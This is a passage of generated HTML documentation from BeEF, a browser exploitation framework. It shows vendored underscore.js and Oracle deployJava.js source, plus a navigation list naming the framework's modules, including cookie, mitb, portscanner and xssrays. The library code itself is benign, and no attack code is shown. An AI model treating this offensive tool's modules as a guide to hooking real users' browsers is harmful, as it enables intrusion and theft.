// Coerce dates and booleans to numeric primitive values. Dates are compared by their
// millisecond representations. Note that invalid dates with millisecond representations
// of `NaN` are not equivalent.
return +a == +b;
// RegExps are compared by their source patterns and flags.
case '[object RegExp]':
return a.source == b.source &&
a.global == b.global &&
a.multiline == b.multiline &&
a.ignoreCase == b.ignoreCase;
}
if (typeof a != 'object' || typeof b != 'object') return false;
// Assume equality for cyclic structures. The algorithm for detecting cyclic
// structures is adapted from ES 5.1 section 15.12.3, abstract operation `JO`.
var length = stack.length;
while (length--) {
// Linear search. Performance is inversely proportional to the number of
// unique nested structures.
if (stack[length] == a) return true;
}
// Add the first object to the stack of traversed objects.
stack.push(a);
var size = 0, result = true;
// Recursively compare objects and arrays.
if (className == '[object Array]') {
// Compare array lengths to determine if a deep comparison is necessary.
size = a.length;
result = size == b.length;
if (result) {
// Deep compare the contents, ignoring non-numeric properties.
while (size--) {
// Ensure commutative equality for sparse arrays.
if (!(result = size in a == size in b && eq(a[size], b[size], stack))) break;
}
}
} else {
// Objects with different constructors are not equivalent.
if ('constructor' in a != 'constructor' in b || a.constructor != b.constructor) return false;
// Deep compare objects.
for (var key in a) {
if (_.has(a, key)) {
// Count the expected number of properties.
size++;
// Deep compare each member.
if (!(result = _.has(b, key) && eq(a[key], b[key], stack))) break;
}
}
// Ensure that both objects contain the same number of properties.
if (result) {
for (key in b) {
if (_.has(b, key) && !(size--)) break;
}
result = !size;
}
}
// Remove the first object from the stack of traversed objects.
stack.pop();
return result;
}
// Perform a deep comparison to check if two objects are equal.
_.isEqual = function(a, b) {
return eq(a, b, []);
};
// Is a given array, string, or object empty?
// An "empty" object has no enumerable own-properties.
_.isEmpty = function(obj) {
if (obj == null) return true;
if (_.isArray(obj) || _.isString(obj)) return obj.length === 0;
for (var key in obj) if (_.has(obj, key)) return false;
return true;
};
// Is a given value a DOM element?
_.isElement = function(obj) {
return !!(obj && obj.nodeType == 1);
};
// Is a given value an array?
// Delegates to ECMA5's native Array.isArray
_.isArray = nativeIsArray || function(obj) {
return toString.call(obj) == '[object Array]';
};
// Is a given variable an object?
_.isObject = function(obj) {
return obj === Object(obj);
};
// Is a given variable an arguments object?
_.isArguments = function(obj) {
return toString.call(obj) == '[object Arguments]';
};
if (!_.isArguments(arguments)) {
_.isArguments = function(obj) {
return !!(obj && _.has(obj, 'callee'));
};
}
// Is a given value a function?
_.isFunction = function(obj) {
return toString.call(obj) == '[object Function]';
};
// Is a given value a string?
_.isString = function(obj) {
return toString.call(obj) == '[object String]';
};
// Is a given value a number?
_.isNumber = function(obj) {
return toString.call(obj) == '[object Number]';
};
// Is a given object a finite number?
_.isFinite = function(obj) {
return _.isNumber(obj) && isFinite(obj);
};
// Is the given value `NaN`?
_.isNaN = function(obj) {
// `NaN` is the only value for which `===` is not reflexive.
return obj !== obj;
};
// Is a given value a boolean?
_.isBoolean = function(obj) {
return obj === true || obj === false || toString.call(obj) == '[object Boolean]';
};
// Is a given value a date?
_.isDate = function(obj) {
return toString.call(obj) == '[object Date]';
};
// Is the given value a regular expression?
_.isRegExp = function(obj) {
return toString.call(obj) == '[object RegExp]';
};
// Is a given value equal to null?
_.isNull = function(obj) {
return obj === null;
};
// Is a given variable undefined?
_.isUndefined = function(obj) {
return obj === void 0;
};
// Has own property?
_.has = function(obj, key) {
return hasOwnProperty.call(obj, key);
};
// Utility Functions
// -----------------
// Run Underscore.js in *noConflict* mode, returning the `_` variable to its
// previous owner. Returns a reference to the Underscore object.
_.noConflict = function() {
root._ = previousUnderscore;
return this;
};
// Keep the identity function around for default iterators.
_.identity = function(value) {
return value;
};
// Run a function **n** times.
_.times = function (n, iterator, context) {
for (var i = 0; i < n; i++) iterator.call(context, i);
};
// Escape a string for HTML interpolation.
_.escape = function(string) {
return (''+string).replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;').replace(/"/g, '&quot;').replace(/'/g, '&#x27;').replace(/\//g,'&#x2F;');
};
// If the value of the named property is a function then invoke it;
// otherwise, return it.
_.result = function(object, property) {
if (object == null) return null;
var value = object[property];
return _.isFunction(value) ? value.call(object) : value;
};
// Add your own custom functions to the Underscore object, ensuring that
// they're correctly added to the OOP wrapper as well.
_.mixin = function(obj) {
each(_.functions(obj), function(name){
addToWrapper(name, _[name] = obj[name]);
});
};
// Generate a unique integer id (unique within the entire client session).
// Useful for temporary DOM ids.
var idCounter = 0;
_.uniqueId = function(prefix) {
var id = idCounter++;
return prefix ? prefix + id : id;
};
// By default, Underscore uses ERB-style template delimiters, change the
// following template settings to use alternative delimiters.
_.templateSettings = {
evaluate : /<%([\s\S]+?)%>/g,
interpolate : /<%=([\s\S]+?)%>/g,
escape : /<%-([\s\S]+?)%>/g
};
// When customizing `templateSettings`, if you don't want to define an
// interpolation, evaluation or escaping regex, we need one that is
// guaranteed not to match.
var noMatch = /.^/;
// Certain characters need to be escaped so that they can be put into a
// string literal.
var escapes = {
'\\': '\\',
"'": "'",
'r': '\r',
'n': '\n',
't': '\t',
'u2028': '\u2028',
'u2029': '\u2029'
};
for (var p in escapes) escapes[escapes[p]] = p;
var escaper = /\\|'|\r|\n|\t|\u2028|\u2029/g;
var unescaper = /\\(\\|'|r|n|t|u2028|u2029)/g;
// Within an interpolation, evaluation, or escaping, remove HTML escaping
// that had been previously added.
var unescape = function(code) {
return code.replace(unescaper, function(match, escape) {
return escapes[escape];
});
};
// JavaScript micro-templating, similar to John Resig's implementation.
// Underscore templating handles arbitrary delimiters, preserves whitespace,
// and correctly escapes quotes within interpolated code.
_.template = function(text, data, settings) {
settings = _.defaults(settings || {}, _.templateSettings);
// Compile the template source, taking care to escape characters that
// cannot be included in a string literal and then unescape them in code
// blocks.
var source = "__p+='" + text
.replace(escaper, function(match) {
return '\\' + escapes[match];
})
.replace(settings.escape || noMatch, function(match, code) {
return "'+\n_.escape(" + unescape(code) + ")+\n'";
})
.replace(settings.interpolate || noMatch, function(match, code) {
return "'+\n(" + unescape(code) + ")+\n'";
})
.replace(settings.evaluate || noMatch, function(match, code) {
return "';\n" + unescape(code) + "\n;__p+='";
}) + "';\n";
// If a variable is not specified, place data values in local scope.
if (!settings.variable) source = 'with(obj||{}){\n' + source + '}\n';
source = "var __p='';" +
"var print=function(){__p+=Array.prototype.join.call(arguments, '')};\n" +
source + "return __p;\n";
var render = new Function(settings.variable || 'obj', '_', source);
if (data) return render(data, _);
var template = function(data) {
return render.call(this, data, _);
};
// Provide the compiled function source as a convenience for build time
// precompilation.
template.source = 'function(' + (settings.variable || 'obj') + '){\n' +
source + '}';
return template;
};
// Add a "chain" function, which will delegate to the wrapper.
_.chain = function(obj) {
return _(obj).chain();
};
// The OOP Wrapper
// ---------------
// If Underscore is called as a function, it returns a wrapped object that
// can be used OO-style. This wrapper holds altered versions of all the
// underscore functions. Wrapped objects may be chained.
var wrapper = function(obj) { this._wrapped = obj; };
// Expose `wrapper.prototype` as `_.prototype`
_.prototype = wrapper.prototype;
// Helper function to continue chaining intermediate results.
var result = function(obj, chain) {
return chain ? _(obj).chain() : obj;
};
// A method to easily add functions to the OOP wrapper.
var addToWrapper = function(name, func) {
wrapper.prototype[name] = function() {
var args = slice.call(arguments);
unshift.call(args, this._wrapped);
return result(func.apply(_, args), this._chain);
};
};
// Add all of the Underscore functions to the wrapper object.
_.mixin(_);
// Add all mutator Array functions to the wrapper.
each(['pop', 'push', 'reverse', 'shift', 'sort', 'splice', 'unshift'], function(name) {
var method = ArrayProto[name];
wrapper.prototype[name] = function() {
var wrapped = this._wrapped;
method.apply(wrapped, arguments);
var length = wrapped.length;
if ((name == 'shift' || name == 'splice') && length === 0) delete wrapped[0];
return result(wrapped, this._chain);
};
});
// Add all accessor Array functions to the wrapper.
each(['concat', 'join', 'slice'], function(name) {
var method = ArrayProto[name];
wrapper.prototype[name] = function() {
return result(method.apply(this._wrapped, arguments), this._chain);
};
});
// Start chaining a wrapped Underscore object.
wrapper.prototype.chain = function() {
this._chain = true;
return this;
};
// Extracts the result from a wrapped and chained object.
wrapper.prototype.value = function() {
return this._wrapped;
};
}).call(this);
});
</code></pre>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html> |
HTML | beef/docs/lib_deployJava.js.html | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Source: lib/deployJava.js</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Source: lib/deployJava.js</h1>
<section>
<article>
<pre class="prettyprint source linenums"><code>/*
* Copyright (c) 2006, 2012, Oracle and/or its affiliates. All rights reserved.
* ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
*
* - Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
*
* - Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* - Neither the name of Oracle nor the names of its
* contributors may be used to endorse or promote products derived
* from this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
* IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
* THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
* PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
* CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
* EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
* PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
* PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
* LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
* NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
* SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
/*
* deployJava.js
*
* This file is part of the Deployment Toolkit. It provides functions for web
* pages to detect the presence of a JRE, install the latest JRE, and easily run
* applets or Web Start programs. More Information on usage of the
* Deployment Toolkit can be found in the Deployment Guide at:
* http://docs.oracle.com/javase/6/docs/technotes/guides/jweb/index.html
*
* The "live" copy of this file may be found at :
* http://java.com/js/deployJava.js.
* For web pages provisioned using https, you may want to access the copy at:
* https://java.com/js/deployJava.js.
*
* You are encouraged to link directly to the live copies.
* The above files are stripped of comments and whitespace for performance,
* You can access this file w/o the whitespace and comments removed at:
* http://java.com/js/deployJava.txt.
*
*/
var deployJava = function() {
/** HTML attribute filter implementation */
var hattrs = {
core: [ 'id', 'class', 'title', 'style' ],
i18n: [ 'lang', 'dir' ],
events: [ 'onclick', 'ondblclick', 'onmousedown', 'onmouseup',
'onmouseover', 'onmousemove', 'onmouseout', 'onkeypress',
'onkeydown', 'onkeyup' ],
applet: [ 'codebase', 'code', 'name', 'archive', 'object',
'width', 'height', 'alt', 'align', 'hspace', 'vspace' ],
object: [ 'classid', 'codebase', 'codetype', 'data', 'type',
'archive', 'declare', 'standby', 'height', 'width', 'usemap',
'name', 'tabindex', 'align', 'border', 'hspace', 'vspace' ]
};
var object_valid_attrs = hattrs.object.concat(hattrs.core, hattrs.i18n,
hattrs.events);
var applet_valid_attrs = hattrs.applet.concat(hattrs.core);
// generic log function
function log(message) {
if ( ! rv.debug ) {return};
beef.debug(message);
}
//checks where given version string matches query
//
//NB: assume format is correct. Can add format check later if needed
// from dtjava.js
function versionCheckEx(query, version) {
if (query == null || query.length == 0) return true;
var c = query.charAt(query.length - 1);
//if it is not explicit pattern but does not have update version then need to append *
if (c != '+' && c != '*' && (query.indexOf('_') != -1 && c != '_')) {
query = query + "*";
c = '*';
}
query = query.substring(0, query.length - 1);
//if query ends with ".", "_" then we want to strip it to allow match of "1.6.*" to shorter form such as "1.6"
//TODO: add support for match of "1.7.0*" to "1.7"?
if (query.length > 0) {
var z = query.charAt(query.length - 1);
if (z == '.' || z == '_') {
query = query.substring(0, query.length - 1);
}
}
if (c == '*') {
//it is match if version starts from it
return (version.indexOf(query) == 0);
} else if (c == '+') {
//match if query string is lexicographically smaller
return query <= version;
}
return false;
}
function getWebStartLaunchIconURL() {
var imageUrl = '//java.com/js/webstart.png';
try {
// for http/https; use protocol less url; use http for all other protocol
return document.location.protocol.indexOf('http') != -1 ?
imageUrl : 'http:' + imageUrl;
} catch (err) {
return 'http:' + imageUrl;
}
}
// GetJava page
function constructGetJavaURL(query) {
var getJavaURL = 'http://java.com/dt-redirect';
if (query == null || query.length == 0) return getJavaURL;
if(query.charAt(0) == '&')
{
query = query.substring(1, query.length);
}
return getJavaURL + '?'+ query;
}
function arHas(ar, attr) {
var len = ar.length;
for (var i = 0; i < len; i++) {
if (ar[i] === attr) return true;
}
return false;
}
function isValidAppletAttr(attr) {
return arHas(applet_valid_attrs, attr.toLowerCase());
}
function isValidObjectAttr(attr) {
return arHas(object_valid_attrs, attr.toLowerCase());
}
/**
* returns true if we can enable DT plugin auto-install without chance of
* deadlock on cert mismatch dialog
*
* requestedJREVersion param is optional - if null, it will be
* treated as installing any JRE version
*
* DT plugin for 6uX only knows about JRE installer signed by SUN cert.
* If it encounter Oracle signed JRE installer, it will have chance of
* deadlock when running with IE. This function is to guard against this.
*/
function enableWithoutCertMisMatchWorkaround(requestedJREVersion) {
// Non-IE browser are okay
if ('MSIE' != deployJava.browserName) return true;
// if DT plugin is 10.0.0 or above, return true
// This is because they are aware of both SUN and Oracle signature and
// will not show cert mismatch dialog that might cause deadlock
if (deployJava.compareVersionToPattern(deployJava.getPlugin().version,
["10", "0", "0"], false, true)) {
return true;
}
// If we got there, DT plugin is 6uX
if (requestedJREVersion == null) {
// if requestedJREVersion is not defined - it means ANY.
// can not guarantee it is safe to install ANY version because 6uX
// DT does not know about Oracle certificates and may deadlock
return false;
}
// 6u32 or earlier JRE installer used Sun certificate
// 6u33+ uses Oracle's certificate
// DT in JRE6 does not know about Oracle certificate => can only
// install 6u32 or earlier without risk of deadlock
return !versionCheckEx("1.6.0_33+", requestedJREVersion);
}
/* HTML attribute filters */
var rv = {
debug: null,
/* version of deployJava.js */
version: "20120801",
firefoxJavaVersion: null,
myInterval: null,
preInstallJREList: null,
returnPage: null,
brand: null,
locale: null,
installType: null,
EAInstallEnabled: false,
EarlyAccessURL: null,
// mime-type of the DeployToolkit plugin object
oldMimeType: 'application/npruntime-scriptable-plugin;DeploymentToolkit',
mimeType: 'application/java-deployment-toolkit',
/* location of the Java Web Start launch button graphic is right next to
* deployJava.js at:
* http://java.com/js/webstart.png
*
* Use protocol less url here for http/https support
*/
launchButtonPNG: getWebStartLaunchIconURL(),
browserName: null,
browserName2: null,
/**
* Returns an array of currently-installed JRE version strings.
* Version strings are of the form #.#[.#[_#]], with the function returning
* as much version information as it can determine, from just family
* versions ("1.4.2", "1.5") through the full version ("1.5.0_06").
*
* Detection is done on a best-effort basis. Under some circumstances
* only the highest installed JRE version will be detected, and
* JREs older than 1.4.2 will not always be detected.
*/
getJREs: function() {
var list = new Array();
if (this.isPluginInstalled()) {
var plugin = this.getPlugin();
var VMs = plugin.jvms;
for (var i = 0; i < VMs.getLength(); i++) {
list[i] = VMs.get(i).version;
}
} else {
var browser = this.getBrowser();
if (browser == 'MSIE') {
if (this.testUsingActiveX('1.7.0')) {
list[0] = '1.7.0';
} else if (this.testUsingActiveX('1.6.0')) {
list[0] = '1.6.0';
} else if (this.testUsingActiveX('1.5.0')) {
list[0] = '1.5.0';
} else if (this.testUsingActiveX('1.4.2')) {
list[0] = '1.4.2';
} else if (this.testForMSVM()) {
list[0] = '1.1';
}
} else if (browser == 'Netscape Family') {
this.getJPIVersionUsingMimeType();
if (this.firefoxJavaVersion != null) {
list[0] = this.firefoxJavaVersion;
} else if (this.testUsingMimeTypes('1.7')) {
list[0] = '1.7.0';
} else if (this.testUsingMimeTypes('1.6')) {
list[0] = '1.6.0';
} else if (this.testUsingMimeTypes('1.5')) {
list[0] = '1.5.0';
} else if (this.testUsingMimeTypes('1.4.2')) {
list[0] = '1.4.2';
} else if (this.browserName2 == 'Safari') {
if (this.testUsingPluginsArray('1.7.0')) {
list[0] = '1.7.0';
} else if (this.testUsingPluginsArray('1.6')) {
list[0] = '1.6.0';
} else if (this.testUsingPluginsArray('1.5')) {
list[0] = '1.5.0';
} else if (this.testUsingPluginsArray('1.4.2')) {
list[0] = '1.4.2';
}
}
}
}
if (this.debug) {
for (var i = 0; i < list.length; ++i) {
log('[getJREs()] We claim to have detected Java SE ' + list[i]);
}
}
return list;
},
/**
* Triggers a JRE installation. The exact effect of triggering an
* installation varies based on platform, browser, and if the
* Deployment Toolkit plugin is installed.
*
* The requestVersion string is of the form #[.#[.#[_#]]][+|*],
* which includes strings such as "1.4", "1.5.0*", and "1.6.0_02+".
* A star (*) means "any version starting within this family" and
* a plus (+) means "any version greater or equal to this".
* "1.5.0*" * matches 1.5.0_06 but not 1.6.0_01, whereas
* "1.5.0+" matches both.
*
* installCallback is an optional argument which holds a reference
* to a javascript callback function for reporting install status.
*
* If the Deployment Toolkit plugin is not present, this will just call
* this.installLatestJRE().
*/
installJRE: function(requestVersion, installCallback) {
var ret = false;
if (this.isPluginInstalled() &&
this.isAutoInstallEnabled(requestVersion)) {
var installSucceeded = false;
if (this.isCallbackSupported()) {
installSucceeded =
this.getPlugin().installJRE(requestVersion, installCallback);
} else {
installSucceeded = this.getPlugin().installJRE(requestVersion);
}
if (installSucceeded) {
this.refresh();
if (this.returnPage != null) {
document.location = this.returnPage;
}
}
return installSucceeded;
} else {
return this.installLatestJRE();
}
},
/**
* returns true if jre auto install for the requestedJREVersion is enabled
* for the local system; false otherwise
*
* requestedJREVersion param is optional - if not specified, it will be
* treated as installing any JRE version
*
* DT plugin for 6uX only knows about JRE installer signed by SUN cert.
* If it encounter Oracle signed JRE installer, it will have chance of
* deadlock when running with IE. This function is to guard against this.
*/
isAutoInstallEnabled: function(requestedJREVersion) {
// if no DT plugin, return false
if (!this.isPluginInstalled()) return false;
if (typeof requestedJREVersion == 'undefined') {
requestedJREVersion = null;
}
return enableWithoutCertMisMatchWorkaround(requestedJREVersion);
},
/**
* returns true if jre install callback is supported
* callback support is added since dt plugin version 10.2.0 or above
*/
isCallbackSupported: function() {
return this.isPluginInstalled() &&
this.compareVersionToPattern(this.getPlugin().version,
["10", "2", "0"], false, true);
},
/**
* Triggers a JRE installation. The exact effect of triggering an
* installation varies based on platform, browser, and if the
* Deployment Toolkit plugin is installed.
*
* In the simplest case, the browser window will be redirected to the
* java.com JRE installation page, and (if possible) a redirect back to
* the current URL upon successful installation. The return redirect is
* not always possible, as the JRE installation may require the browser to
* be restarted.
*
* installCallback is an optional argument which holds a reference
* to a javascript callback function for reporting install status.
*
* In the best case (when the Deployment Toolkit plugin is present), this
* function will immediately cause a progress dialog to be displayed
* as the JRE is downloaded and installed.
*/
installLatestJRE: function(installCallback) {
if (this.isPluginInstalled() && this.isAutoInstallEnabled()) {
var installSucceeded = false;
if (this.isCallbackSupported()) {
installSucceeded = this.getPlugin().installLatestJRE(installCallback);
} else {
installSucceeded = this.getPlugin().installLatestJRE();
}
if (installSucceeded) {
this.refresh();
if (this.returnPage != null) {
document.location = this.returnPage;
}
}
return installSucceeded;
} else {
var browser = this.getBrowser();
var platform = navigator.platform.toLowerCase();
if ((this.EAInstallEnabled == 'true') &&
(platform.indexOf('win') != -1) &&
(this.EarlyAccessURL != null)) {
this.preInstallJREList = this.getJREs();
if (this.returnPage != null) {
this.myInterval =
setInterval("deployJava.poll()", 3000);
}
location.href = this.EarlyAccessURL;
// we have to return false although there may be an install
// in progress now, when complete it may go to return page
return false;
} else {
if (browser == 'MSIE') {
return this.IEInstall();
} else if ((browser == 'Netscape Family') &&
(platform.indexOf('win32') != -1)) {
return this.FFInstall();
} else {
location.href = constructGetJavaURL(
((this.returnPage != null) ?
('&returnPage=' + this.returnPage) : '') +
((this.locale != null) ?
('&locale=' + this.locale) : '') +
((this.brand != null) ?
('&brand=' + this.brand) : ''));
}
// we have to return false although there may be an install
// in progress now, when complete it may go to return page
return false;
}
}
},
/**
* Ensures that an appropriate JRE is installed and then runs an applet.
* minimumVersion is of the form #[.#[.#[_#]]], and is the minimum
* JRE version necessary to run this applet. minimumVersion is optional,
* defaulting to the value "1.1" (which matches any JRE).
* If an equal or greater JRE is detected, runApplet() will call
* writeAppletTag(attributes, parameters) to output the applet tag,
* otherwise it will call installJRE(minimumVersion + '+').
*
* After installJRE() is called, the script will attempt to detect that the
* JRE installation has completed and begin running the applet, but there
* are circumstances (such as when the JRE installation requires a browser
* restart) when this cannot be fulfilled.
*
* As with writeAppletTag(), this function should only be called prior to
* the web page being completely rendered. Note that version wildcards
* (star (*) and plus (+)) are not supported, and including them in the
* minimumVersion will result in an error message.
*/
runApplet: function(attributes, parameters, minimumVersion) {
if (minimumVersion == 'undefined' || minimumVersion == null) {
minimumVersion = '1.1';
}
var regex = "^(\\d+)(?:\\.(\\d+)(?:\\.(\\d+)(?:_(\\d+))?)?)?$";
var matchData = minimumVersion.match(regex);
if (this.returnPage == null) {
// if there is an install, come back here and run the applet
this.returnPage = document.location;
}
if (matchData != null) {
var browser = this.getBrowser();
if (browser != '?') {
if (this.versionCheck(minimumVersion + '+')) {
this.writeAppletTag(attributes, parameters);
} else if (this.installJRE(minimumVersion + '+')) {
// after successful install we need to refresh page to pick
// pick up new plugin
this.refresh();
location.href = document.location;
this.writeAppletTag(attributes, parameters);
}
} else {
// for unknown or Safari - just try to show applet
this.writeAppletTag(attributes, parameters);
}
} else {
log('[runApplet()] Invalid minimumVersion argument to runApplet():' +
minimumVersion);
}
},
/**
* Outputs an applet tag with the specified attributes and parameters, where
* both attributes and parameters are associative arrays. Each key/value
* pair in attributes becomes an attribute of the applet tag itself, while
* key/value pairs in parameters become <PARAM> tags. No version checking
* or other special behaviors are performed; the tag is simply written to
* the page using document.writeln().
*
* As document.writeln() is generally only safe to use while the page is
* being rendered, you should never call this function after the page
* has been completed.
*/
writeAppletTag: function(attributes, parameters) {
var startApplet = '<' + 'applet ';
var params = '';
var endApplet = '<' + '/' + 'applet' + '>';
var addCodeAttribute = true;
if (null == parameters || typeof parameters != 'object') {
parameters = new Object();
}
for (var attribute in attributes) {
if (! isValidAppletAttr(attribute)) {
parameters[attribute] = attributes[attribute];
} else {
startApplet += (' ' +attribute+ '="' +attributes[attribute] + '"');
if (attribute == 'code') {
addCodeAttribute = false;
}
}
}
var codebaseParam = false;
for (var parameter in parameters) {
if (parameter == 'codebase_lookup') {
codebaseParam = true;
}
// Originally, parameter 'object' was used for serialized
// applets, later, to avoid confusion with object tag in IE
// the 'java_object' was added. Plugin supports both.
if (parameter == 'object' || parameter == 'java_object' ||
parameter == 'java_code' ) {
addCodeAttribute = false;
}
params += '<param name="' + parameter + '" value="' +
parameters[parameter] + '"/>';
}
if (!codebaseParam) {
params += '<param name="codebase_lookup" value="false"/>';
}
if (addCodeAttribute) {
startApplet += (' code="dummy"');
}
startApplet += '>';
document.write(startApplet + '\n' + params + '\n' + endApplet);
},
/**
* Returns true if there is a matching JRE version currently installed
* (among those detected by getJREs()). The versionPattern string is
* of the form #[.#[.#[_#]]][+|*], which includes strings such as "1.4",
* "1.5.0*", and "1.6.0_02+".
* A star (*) means "any version within this family" and a plus (+) means
* "any version greater or equal to the specified version". "1.5.0*"
* matches 1.5.0_06 but not 1.6.0_01, whereas "1.5.0+" matches both.
*
* If the versionPattern does not include all four version components
* but does not end with a star or plus, it will be treated as if it
* ended with a star. "1.5" is exactly equivalent to "1.5*", and will
* match any version number beginning with "1.5".
*
* If getJREs() is unable to detect the precise version number, a match
* could be ambiguous. For example if getJREs() detects "1.5", there is
* no way to know whether the JRE matches "1.5.0_06+". versionCheck()
* compares only as much of the version information as could be detected,
* so versionCheck("1.5.0_06+") would return true in in this case.
*
* Invalid versionPattern will result in a JavaScript error alert.
* versionPatterns which are valid but do not match any existing JRE
* release (e.g. "32.65+") will always return false.
*/
versionCheck: function(versionPattern)
{
var index = 0;
var regex = "^(\\d+)(?:\\.(\\d+)(?:\\.(\\d+)(?:_(\\d+))?)?)?(\\*|\\+)?$";
var matchData = versionPattern.match(regex);
if (matchData != null) {
// default is exact version match
// examples:
// local machine has 1.7.0_04 only installed
// exact match request is "1.7.0_05": return false
// family match request is "1.7.0*": return true
// minimum match request is "1.6+": return true
var familyMatch = false;
var minMatch = false;
var patternArray = new Array();
for (var i = 1; i < matchData.length; ++i) {
// browser dependency here.
// Fx sets 'undefined', IE sets '' string for unmatched groups
if ((typeof matchData[i] == 'string') && (matchData[i] != '')) {
patternArray[index] = matchData[i];
index++;
}
}
if (patternArray[patternArray.length-1] == '+') {
// + specified in request - doing a minimum match
minMatch = true;
familyMatch = false;
patternArray.length--;
} else if (patternArray[patternArray.length-1] == '*') {
// * specified in request - doing a family match
minMatch = false;
familyMatch = true;
patternArray.length--;
} else if (patternArray.length < 4) {
// versionPattern does not include all four version components
// and does not end with a star or plus, it will be treated as
// if it ended with a star. (family match)
minMatch = false;
familyMatch = true;
}
var list = this.getJREs();
for (var i = 0; i < list.length; ++i) {
if (this.compareVersionToPattern(list[i], patternArray,
familyMatch, minMatch)) {
return true;
}
}
return false;
} else {
var msg = 'Invalid versionPattern passed to versionCheck: ' +
versionPattern;
log('[versionCheck()] ' + msg);
alert(msg);
return false;
}
},
/**
* Returns true if an installation of Java Web Start of the specified
* minimumVersion can be detected. minimumVersion is optional, and
* if not specified, '1.4.2' will be used.
* (Versions earlier than 1.4.2 may not be detected.)
*/
isWebStartInstalled: function(minimumVersion) {
var browser = this.getBrowser();
if (browser == '?') {
// we really don't know - better to try to use it than reinstall
return true;
}
if (minimumVersion == 'undefined' || minimumVersion == null) {
minimumVersion = '1.4.2';
}
var retval = false;
var regex = "^(\\d+)(?:\\.(\\d+)(?:\\.(\\d+)(?:_(\\d+))?)?)?$";
var matchData = minimumVersion.match(regex);
if (matchData != null) {
retval = this.versionCheck(minimumVersion + '+');
} else {
log('[isWebStartInstaller()] Invalid minimumVersion argument to isWebStartInstalled(): ' + minimumVersion);
retval = this.versionCheck('1.4.2+');
}
return retval;
},
// obtain JPI version using navigator.mimeTypes array
// if found, set the version to this.firefoxJavaVersion
getJPIVersionUsingMimeType: function() {
// Walk through the full list of mime types.
for (var i = 0; i < navigator.mimeTypes.length; ++i) {
var s = navigator.mimeTypes[i].type;
// The jpi-version is the plug-in version. This is the best
// version to use.
var m = s.match(/^application\/x-java-applet;jpi-version=(.*)$/);
if (m != null) {
this.firefoxJavaVersion = m[1];
// Opera puts the latest sun JRE last not first
if ('Opera' != this.browserName2) {
break;
}
}
}
},
// launch the specified JNLP application using the passed in jnlp file
// the jnlp file does not need to have a codebase
// this requires JRE 7 or above to work
// if machine has no JRE 7 or above, we will try to auto-install and then launch
// (function will return false if JRE auto-install failed)
launchWebStartApplication: function(jnlp) {
var uaString = navigator.userAgent.toLowerCase();
this.getJPIVersionUsingMimeType();
// make sure we are JRE 7 or above
if (this.isWebStartInstalled('1.7.0') == false) {
// perform latest JRE auto-install
if ((this.installJRE('1.7.0+') == false) ||
((this.isWebStartInstalled('1.7.0') == false))) {
return false;
}
}
var jnlpDocbase = null;
// use document.documentURI for docbase
if (document.documentURI) {
jnlpDocbase = document.documentURI;
}
// fallback to document.URL if documentURI not available
if (jnlpDocbase == null) {
jnlpDocbase = document.URL;
}
var browser = this.getBrowser();
var launchTag;
if (browser == 'MSIE') {
launchTag = '<' +
'object classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" ' +
'width="0" height="0">' +
